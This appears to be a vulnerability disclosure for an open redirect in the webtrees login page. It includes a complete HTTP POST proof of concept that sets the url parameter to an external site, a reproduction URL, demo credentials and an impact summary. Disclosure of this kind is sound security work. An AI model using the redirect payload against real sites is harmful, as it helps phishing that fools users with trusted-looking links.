Description

OpenRedirect at login with parameter &url=

Proof of Concept

// PoC.request
POST /demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=ekks8678620p55do7do21jd4p1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

_csrf=o57ZmYPF0fQhPhLNSs3ICWiKzwnj9wFt&url=https%3A%2F%2Fgoogle.com&username=editor&password=editor

Step to Reproduct

Access login with url: https://dev.webtrees.net/demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo&url=https://google.com

After login success it will redirect to google.com

Impact

This functionality is not restricted to relative URLs within the application and could be leveraged by an attacker to fool an end user into believing that a malicious URL they were redirected to is valid.